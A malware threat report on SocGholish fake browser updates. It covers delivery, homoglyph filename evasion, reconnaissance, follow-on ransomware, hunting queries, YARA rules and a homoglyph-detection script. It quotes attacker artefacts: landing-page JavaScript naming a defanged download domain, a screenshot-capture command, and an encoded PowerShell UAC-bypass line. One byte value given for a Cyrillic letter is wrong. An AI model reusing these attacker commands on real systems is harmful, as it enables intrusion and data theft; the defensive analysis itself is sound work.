Threat Report

SocGholish is a downloader-class malware first discovered in the wild in April 2018. It relies on drive-by downloads and masquerades as genuine software update files for initial access, and it remains one of the most active and prominent downloader families.

This malware (also known as FakeUpdates) is associated with the Russian cybercrime group Evil Corp. The group is also believed to monetize the malware by selling access to compromised systems. A machine infected with SocGholish can end up with multiple further infections: internal reconnaissance data is sent to a C2 server, used for weaponization, and a secondary payload is then downloaded.

SocGholish gains access by luring users to a compromised website that hosts the malware payload; once there, the user is prompted to update their browser. Users who fall for the lure download the "update", which is generally a JavaScript payload, and so launch the attack.

FakeUpdates Popup window

Analysis

Initial Access

Users are redirected to compromised websites after a sequence of browser validation checks. Once the victim's browser information has been gleaned, further redirects occur and the user is prompted to download a fake browser update.

After the user clicks the update button, the browser downloads one of three files:

var domain = '//gnf6.ruscacademy[.]in/';
var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
var statTypeParamName = 'st';

var filename = 'download.hta';
var browser = 'Chrome';
var special = '1';  
var filePlain = window.atob(file64);
var a = document.getElementById('buttonDownload');

JavaScript code identified from the FakeUpdates landing pages

The malware payload, often packaged as Update.js or Chrome.Update.zip, is delivered from the compromised website. Earlier the payload was packaged as a zip file before delivery, but there has since been a shift to direct delivery. Renaming the zip files was an early attempt to evade filename-based defences; the actors have since adopted a more sophisticated method.

Lookalike Characters

SocGholish began using homoglyphs ("lookalike" characters) to replace certain characters in the file name, which helped it evade defences that rely on filename matching to detect anomalies. For example, the Latin letters "C" and "a" were replaced with their Cyrillic lookalikes "С" (UTF-8 0xd0a1) and "а" (0xd0a1), giving a filename that looks identical to the human eye but consists of different code points.

Typical filename: Chrome.Update.zip
Look-alike characters filename: Сhrome.Updаte.zip

To detection tools the two names are entirely different, so the file slips through perimeter defences. SocGholish has been seen regularly changing filenames, swapping out different characters in different campaigns.

Character Lookalikes (homoglyphs)
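As an added example (not code from the report), the following Python flags a mixed-script filename such as the lookalike name above and folds the Cyrillic homoglyphs back to Latin so that a name-based match list still works; the sample filenames are constructed and the CONFUSABLES table is a small hand-built subset, not the full Unicode confusables data.

```python
import unicodedata

# Constructed sample filenames (not taken from a live sample): the second swaps the
# Latin "C" and "a" of the first for Cyrillic "С" (U+0421) and "а" (U+0430).
TYPICAL = "Chrome.Update.zip"
LOOKALIKE = "\u0421hrome.Upd\u0430te.zip"

# Minimal hand-built map of Cyrillic letters to the Latin letters they resemble.
# A production tool would use the full Unicode confusables table instead (assumption).
CONFUSABLES = {
    "\u0410": "A", "\u0412": "B", "\u0421": "C", "\u0415": "E", "\u041d": "H", "\u041a": "K",
    "\u041c": "M", "\u041e": "O", "\u0420": "P", "\u0422": "T", "\u0425": "X",
    "\u0430": "a", "\u0441": "c", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0445": "x",
    "\u0443": "y",
}

def scripts_in(name):
    """Return the set of scripts (first word of the Unicode name) used by letters in name."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in name if ch.isalpha()}

def is_mixed_script(name):
    """A filename whose letters come from more than one script is a homoglyph red flag."""
    return len(scripts_in(name)) > 1

def non_ascii_letters(name):
    """List each non-ASCII character with its code point and UTF-8 bytes for analyst review."""
    return [(ch, "U+%04X" % ord(ch), ch.encode("utf-8")) for ch in name if ord(ch) > 0x7F]

def skeleton(name):
    """Fold known confusables back to Latin so exact-match lists still work."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in name)

def matches_known_lure(name, known=("Chrome.Update.zip", "Update.js")):
    """Compare the folded filename against known lure names, case-insensitively."""
    return skeleton(name).casefold() in {k.casefold() for k in known}
```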

Internal Reconnaissance

SocGholish is designed to spread other malware, so the threat it poses depends on the second-stage payload it downloads onto the device. Once it gains access to a device, it uses native WMI (Windows Management Instrumentation) calls to collect more information about the host. This internal reconnaissance is often followed by Active Directory enumeration and then by user and machine discovery.

This data is exfiltrated to the SocGholish C2 infrastructure and used to determine which malware variants best suit the host as part of the weaponization process.

The information collected by the initial payload as part of the fingerprinting process includes:

It has also been observed that the attacker downloads and uses a utility called nircmdc.exe to take PNG screenshots of the affected host, which are then sent back to the SocGholish C2 infrastructure via an HTTP POST request.

"C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot
"C:\Users\User\AppData\Local\Temp\abcd.png"

Secondary payloads

"While Historically NetSupport had been a very common second payload of choice, SocGholish began showing a preference for other RATs in 2022 and this trend continued into 2023." - RedCanary

In some cases, Cobalt Strike or Impacket has been deployed for post-exploitation activities within 10-15 minutes of initial compromise.

SocGholish has also been known to distribute other malware, including AZORult, DoppelPaymer, Dridex, Gootloader, and NetSupport. SocGholish intrusions have often led to ransomware infections, a significant threat to the organization's data: depending on the variant, the ransomware may encrypt corporate data or steal it and threaten to leak it. Ransomware families associated with SocGholish include LockBit, WastedLocker, and others.

Soon after delivery of the secondary payload, post-exploitation reconnaissance, lateral movement and pre-ransomware activity are observed. Proofpoint tracks the adversary behind SocGholish as TA569.

Attacker Tactics

The threat actors make use of several utilities such as Impacket, Mimikatz and SessionGopher to harvest credentials and password hashes. The attacker was also observed using a Windows UAC bypass technique, Empire's Invoke-EventVwrBypass, to launch executables via eventvwr.exe:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x

Event log artifacts also revealed defence evasion techniques executed through PowerShell to stay stealthy and undetected.

Source: Mandiant Threat Intelligence

Similar Initial Access Trend

Since 2023, new threats have followed in SocGholish's footsteps with similar TTPs: Scarlet Goldfinch, ClearFake and FakeUpdateRU all deliver a fake browser update lure in much the same way.

These newcomers have distinct TTPs across their attack lifecycle and deliver a variety of stealers and RATs, some of which are:

Fake browser updates have trended upward in recent years and are an initial access technique worth watching. Proofpoint has published an article on this fake browser update landscape.

Detection

Hunting opportunity

Windows Script Host spawned from a browser and making an external network connection

parent_process == [any browser]
&&
process == wscript.exe
&&
has_external_networkconnection

WMI calls made by the script, via cmd or PowerShell

parent_process == wscript.exe
&&
process == powershell.exe || cmd.exe
&&
command_includes ("Get-WmiObject" || "Invoke-WmiMethod" || "wmic")

Executing the screenshot utility nircmdc.exe

parent_process == powershell.exe || cmd.exe
&&
process == nircmdc.exe

Windows UAC bypass using eventvwr.exe

parent_process == powershell.exe
&&
process == eventvwr.exe
&&
command_includes ("Invoke-EventVwrBypass")

Script files doing reconnaissance with whoami / net and writing the output to a file

parent_process == wscript.exe
&&
process == cmd.exe
&&
command_includes ('whoami /all >>' || 'net' || 'net.exe')

Enumerating domain trust relationships with nltest.exe

process == nltest.exe
&&
command_includes ('/domain_trusts' || '/all_trusts')

Sample YARA Rules

Sample 1:

rule SocGholish_Sample_1    // rule name added here; the report gives only the strings and condition
{
    strings:
        // likely UTF-16 (wildcard between bytes), reversed "http": p?t?t?h
        $x = { 70 ?? 74 ?? 74 ?? 68 }
        // likely UTF-16, reversed "pixel.png": g?n?p?.l?e?x?i?p
        $y = { 67 ?? 6e ?? 70 ?? 2e [1-3] 6c ?? 65 ?? 78 ?? 69 ?? 70 }
        // likely UTF-16, reversed "1x1.gif": f?i?g?.?1?x?1
        $z = { 66 ?? 69 ?? 67 ?? 2e ?? 31 ?? 78 ?? 31 }

    condition:
        $x and ($y or $z) and filesize > 300 and filesize < 3000
}


Sample 2:

rule SocGholish_Sample_2    // rule name added here; the report gives only the strings and condition
{
    strings:
        // bit arithmetic typical of an inline base64-style decoder
        $x = "&15)<<4)|("
        // "indexOf(??.charAt(??++)": decoder loop looking up each input character
        $y = { 69 6e 64 65 78 4f 66 28 ?? ?? 2e 63 68 61 72 41 74 28 ?? ?? 2b 2b 29 }
        // start of the standard base64 alphabet; its absence suggests a custom alphabet
        $z = "ABCD"

    condition:
        $x and #y == 4 and (not $z) and filesize > 300 and filesize < 3000
}


IOCs  and File Samples for testing

IOCs

ThreatFox IOC Database: Link

SocGholish Malicous URLs Database: Link

Malware Samples (for testing)

SocGholish MalwareBazaar Database: Link

Source/References